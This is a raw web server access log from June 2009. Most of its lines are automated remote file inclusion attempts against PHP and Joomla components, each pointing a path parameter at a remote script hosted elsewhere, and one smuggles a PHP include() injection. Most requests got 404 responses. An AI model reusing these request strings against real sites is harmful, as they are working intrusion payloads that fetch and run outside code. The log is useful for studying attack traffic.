94.23.200.54 - - [20/Jun/2009:04:28:04 -0400] "GET /logs/access_log.Q109051800//appserv/main.php?appserv_root=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
82.194.87.219 - - [20/Jun/2009:04:28:08 -0400] "GET /logs///index.php?page=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 214 "-" "libwww-perl/5.822"
94.23.200.54 - - [20/Jun/2009:04:28:17 -0400] "GET /logs/access_log.Q109060100//appserv/main.php?appserv_root=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
74.200.195.130 - - [20/Jun/2009:04:28:42 -0400] "GET /logs/error_log.Q109060400/errors.php?error=http://maxhost.org/scripts/v7id.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
210.109.101.217 - - [20/Jun/2009:04:29:43 -0400] "GET /logs/access_log.Q109052400%20%20//components/com_simpleboard/image_upload.php?sbp=http://personel.trakya.edu.tr/media_yedek/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
210.109.101.217 - - [20/Jun/2009:04:29:43 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://personel.trakya.edu.tr/media_yedek/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
210.109.101.217 - - [20/Jun/2009:04:29:43 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://personel.trakya.edu.tr/media_yedek/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
210.109.101.217 - - [20/Jun/2009:04:29:43 -0400] "GET /logs/access_log.Q109052400%20%20//components/com_simpleboard/image_upload.php?sbp=http://personel.trakya.edu.tr/media_yedek/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
210.109.101.217 - - [20/Jun/2009:04:29:43 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://personel.trakya.edu.tr/media_yedek/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
210.109.101.217 - - [20/Jun/2009:04:29:43 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://personel.trakya.edu.tr/media_yedek/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
61.250.85.185 - - [20/Jun/2009:04:29:43 -0400] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 246 "-" "libwww-perl/5.79"
61.250.85.185 - - [20/Jun/2009:04:29:43 -0400] "GET //includes/file_includer.php?gzip=0&file=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 225 "-" "libwww-perl/5.79"
209.59.12.99 - - [20/Jun/2009:04:29:52 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.82.228.83 - - [20/Jun/2009:04:30:03 -0400] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
72.82.228.83 - - [20/Jun/2009:04:30:04 -0400] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
72.82.228.83 - - [20/Jun/2009:04:30:04 -0400] "GET /logs/access_log.Q109061200//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
72.82.228.83 - - [20/Jun/2009:04:30:12 -0400] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
72.82.228.83 - - [20/Jun/2009:04:30:12 -0400] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
72.82.228.83 - - [20/Jun/2009:04:30:12 -0400] "GET /logs/access_log.Q109061200//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
72.82.228.83 - - [20/Jun/2009:04:31:01 -0400] "GET /logs/access_log.Q109061300//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
72.82.228.83 - - [20/Jun/2009:04:31:21 -0400] "GET /logs/access_log.Q109061300//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
195.34.78.110 - - [20/Jun/2009:04:33:00 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
195.34.78.110 - - [20/Jun/2009:04:33:00 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
195.34.78.110 - - [20/Jun/2009:04:33:00 -0400] "GET /logs/access_log.Q109050700//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
195.34.78.110 - - [20/Jun/2009:04:33:15 -0400] "GET /logs/access_log.Q109061100//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
66.11.230.36 - - [20/Jun/2009:04:34:08 -0400] "GET ///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
66.11.230.36 - - [20/Jun/2009:04:34:08 -0400] "GET /logs///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
66.11.230.36 - - [20/Jun/2009:04:34:09 -0400] "GET /logs/access_log.Q109052800%20%20///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
66.11.230.36 - - [20/Jun/2009:04:34:21 -0400] "GET /logs/error_log.Q109052800%20%20///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jun/2009:04:34:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.11.230.36 - - [20/Jun/2009:04:35:17 -0400] "GET /logs/access_log.Q109052800///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
66.11.230.36 - - [20/Jun/2009:04:35:22 -0400] "GET /logs/error_log.Q109052800///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
82.194.87.219 - - [20/Jun/2009:04:35:47 -0400] "GET /logs///index.php?p=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 214 "-" "libwww-perl/5.822"
72.82.228.83 - - [20/Jun/2009:04:36:09 -0400] "GET /logs/access_log.Q109061300%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
72.82.228.83 - - [20/Jun/2009:04:36:10 -0400] "GET /logs/access_log.Q109061200%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
72.82.228.83 - - [20/Jun/2009:04:36:36 -0400] "GET /logs/access_log.Q109061200%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
72.82.228.83 - - [20/Jun/2009:04:36:37 -0400] "GET /logs/access_log.Q109061300%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
211.48.190.67 - - [20/Jun/2009:04:36:59 -0400] "GET /logs/access_log.Q109051700/errors.php?error=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
211.48.190.67 - - [20/Jun/2009:04:37:00 -0400] "GET /errors.php?error=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
211.48.190.67 - - [20/Jun/2009:04:37:00 -0400] "GET /logs/errors.php?error=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
123.143.98.5 - - [20/Jun/2009:04:37:16 -0400] "GET /logs/access_log.Q109052900/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
61.250.85.185 - - [20/Jun/2009:04:38:16 -0400] "GET /logs/error_log.Q109061500//includes/file_includer.php?gzip=0&file=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
61.250.85.185 - - [20/Jun/2009:04:38:17 -0400] "GET //includes/file_includer.php?gzip=0&file=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 225 "-" "libwww-perl/5.79"
61.250.85.185 - - [20/Jun/2009:04:38:17 -0400] "GET /logs//includes/file_includer.php?gzip=0&file=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 230 "-" "libwww-perl/5.79"
61.250.85.185 - - [20/Jun/2009:04:38:18 -0400] "GET /logs/error_log.Q109061500/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 272 "-" "libwww-perl/5.79"
61.250.85.185 - - [20/Jun/2009:04:38:19 -0400] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 246 "-" "libwww-perl/5.79"
61.250.85.185 - - [20/Jun/2009:04:38:19 -0400] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
211.189.40.249 - - [20/Jun/2009:04:39:09 -0400] "GET /logs///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
211.189.40.249 - - [20/Jun/2009:04:39:09 -0400] "GET ///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
211.189.40.249 - - [20/Jun/2009:04:39:09 -0400] "GET /logs/access_log.Q109052200%20%20///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
211.189.40.249 - - [20/Jun/2009:04:39:21 -0400] "GET /logs/access_log.Q109052000%20%20///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jun/2009:04:39:52 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
123.143.98.5 - - [20/Jun/2009:04:40:01 -0400] "GET /logs/access_log.Q109052900/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
211.48.190.67 - - [20/Jun/2009:04:41:48 -0400] "GET /logs/access_log.Q109052300/errors.php?error=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
66.249.71.54 - - [20/Jun/2009:04:42:06 -0400] "GET /images/store_bone_section2.jpg HTTP/1.1" 200 21458 "-" "Googlebot-Image/1.0"
66.11.230.36 - - [20/Jun/2009:04:42:42 -0400] "GET /logs///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
66.11.230.36 - - [20/Jun/2009:04:42:42 -0400] "GET /logs/access_log.Q109052200%20%20///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
66.11.230.36 - - [20/Jun/2009:04:42:42 -0400] "GET ///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
211.189.40.249 - - [20/Jun/2009:04:42:57 -0400] "GET /logs///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
211.189.40.249 - - [20/Jun/2009:04:42:57 -0400] "GET /logs/access_log.Q109050700%20%20///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
211.189.40.249 - - [20/Jun/2009:04:42:58 -0400] "GET ///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
211.189.40.249 - - [20/Jun/2009:04:43:03 -0400] "GET /logs/access_log.Q109050800%20%20///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
66.11.230.36 - - [20/Jun/2009:04:43:21 -0400] "GET /logs/access_log.Q109052500%20%20///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
211.189.40.249 - - [20/Jun/2009:04:43:36 -0400] "GET /logs/access_log.Q109050700///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
211.189.40.249 - - [20/Jun/2009:04:43:36 -0400] "GET /logs/access_log.Q109060300///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
211.189.40.249 - - [20/Jun/2009:04:43:43 -0400] "GET /logs///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
211.189.40.249 - - [20/Jun/2009:04:43:43 -0400] "GET /logs/access_log.Q109051000///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
211.189.40.249 - - [20/Jun/2009:04:43:43 -0400] "GET ///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
211.189.40.249 - - [20/Jun/2009:04:43:55 -0400] "GET /logs/access_log.Q109051100///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
211.189.40.249 - - [20/Jun/2009:04:44:34 -0400] "GET /logs///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
211.189.40.249 - - [20/Jun/2009:04:44:34 -0400] "GET /logs/access_log.Q109060300%20%20///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
211.189.40.249 - - [20/Jun/2009:04:44:34 -0400] "GET ///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
211.189.40.249 - - [20/Jun/2009:04:44:46 -0400] "GET /logs/access_log.Q109060300%20%20///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
211.189.40.249 - - [20/Jun/2009:04:44:46 -0400] "GET ///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
211.189.40.249 - - [20/Jun/2009:04:44:46 -0400] "GET /logs///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jun/2009:04:44:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.103.72.226 - - [20/Jun/2009:04:45:11 -0400] "GET //include/write.php?dir=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
83.103.72.226 - - [20/Jun/2009:04:45:11 -0400] "GET /logs//include/write.php?dir=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
66.11.230.36 - - [20/Jun/2009:04:45:14 -0400] "GET ///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
66.11.230.36 - - [20/Jun/2009:04:45:14 -0400] "GET /logs///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
66.11.230.36 - - [20/Jun/2009:04:45:14 -0400] "GET /logs/access_log.Q109052200%20%20///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
211.189.40.249 - - [20/Jun/2009:04:45:18 -0400] "GET /logs/access_log.Q109060400%20%20///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
211.189.40.249 - - [20/Jun/2009:04:45:40 -0400] "GET /logs/access_log.Q109060400%20%20///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
66.249.71.14 - - [20/Jun/2009:04:46:18 -0400] "GET /images/home_welcome_bkgrd4.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
83.103.72.226 - - [20/Jun/2009:04:47:09 -0400] "GET /logs//include/write.php?dir=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
83.103.72.226 - - [20/Jun/2009:04:47:09 -0400] "GET //include/write.php?dir=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
77.221.151.178 - - [20/Jun/2009:04:47:28 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.postcon.de/404.txt??? HTTP/1.1" 200 453 "-" "libwww-perl/5.808"
66.249.71.14 - - [20/Jun/2009:04:48:00 -0400] "GET /images/ACE_BoneTacking.pdf HTTP/1.1" 200 2605306 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
211.189.40.249 - - [20/Jun/2009:04:48:59 -0400] "GET /logs/access_log.Q109051200///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
211.189.40.249 - - [20/Jun/2009:04:49:23 -0400] "GET /logs/access_log.Q109051800///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
211.189.40.249 - - [20/Jun/2009:04:49:24 -0400] "GET /logs/access_log.Q109052200///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
87.239.22.167 - - [20/Jun/2009:04:49:48 -0400] "GET /logs/access_log.Q109051500//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
87.239.22.167 - - [20/Jun/2009:04:49:48 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.808"
209.59.12.99 - - [20/Jun/2009:04:49:52 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.239.22.167 - - [20/Jun/2009:04:50:04 -0400] "GET /logs/access_log.Q109060600//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
66.11.230.36 - - [20/Jun/2009:04:50:39 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
66.11.230.36 - - [20/Jun/2009:04:50:39 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
66.11.230.36 - - [20/Jun/2009:04:50:40 -0400] "GET /logs/access_log.Q109052900%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
66.11.230.36 - - [20/Jun/2009:04:50:46 -0400] "GET /logs/access_log.Q109061400///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
66.11.230.36 - - [20/Jun/2009:04:51:07 -0400] "GET /logs/access_log.Q109051900///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
61.250.85.185 - - [20/Jun/2009:04:51:19 -0400] "GET //includes/file_includer.php?gzip=0&file=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 225 "-" "libwww-perl/5.79"
61.250.85.185 - - [20/Jun/2009:04:51:19 -0400] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 246 "-" "libwww-perl/5.79"
66.11.230.36 - - [20/Jun/2009:04:51:21 -0400] "GET /logs/access_log.Q109052000%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
211.189.40.249 - - [20/Jun/2009:04:52:39 -0400] "GET /logs/access_log.Q109060300///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
211.189.40.249 - - [20/Jun/2009:04:52:41 -0400] "GET /logs/access_log.Q109060500///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
211.189.40.249 - - [20/Jun/2009:04:52:44 -0400] "GET /logs/access_log.Q109060300///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
211.189.40.249 - - [20/Jun/2009:04:52:45 -0400] "GET /logs/access_log.Q109060500///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
66.11.230.36 - - [20/Jun/2009:04:53:09 -0400] "GET /logs/access_log.Q109052200///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
66.11.230.36 - - [20/Jun/2009:04:53:11 -0400] "GET /logs/access_log.Q109051100///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
77.221.151.178 - - [20/Jun/2009:04:53:28 -0400] "GET /logs/access_log.Q109060400///?_SERVER[DOCUMENT_ROOT]=http://www.postcon.de/404.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.808"
77.221.151.178 - - [20/Jun/2009:04:53:29 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.postcon.de/404.txt??? HTTP/1.1" 200 453 "-" "libwww-perl/5.808"
77.221.151.178 - - [20/Jun/2009:04:53:29 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.postcon.de/404.txt??? HTTP/1.1" 200 6248 "-" "libwww-perl/5.808"
77.221.151.178 - - [20/Jun/2009:04:54:29 -0400] "GET /logs/access_log.Q109053100///?_SERVER[DOCUMENT_ROOT]=http://www.postcon.de/404.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.808"
74.55.29.146 - - [20/Jun/2009:04:54:37 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
74.55.29.146 - - [20/Jun/2009:04:54:37 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.189.40.249 - - [20/Jun/2009:04:55:00 -0400] "GET /logs/access_log.Q109060800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
211.189.40.249 - - [20/Jun/2009:04:55:00 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.189.40.249 - - [20/Jun/2009:04:55:00 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
